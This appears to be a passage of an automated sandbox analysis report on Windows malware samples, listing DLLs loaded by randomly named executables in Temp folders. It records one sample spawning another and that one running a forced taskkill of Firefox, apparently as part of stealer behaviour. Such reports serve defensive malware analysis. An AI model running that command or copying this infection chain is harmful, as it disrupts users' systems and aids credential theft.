Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe "C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe"
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: cryptbase.dll
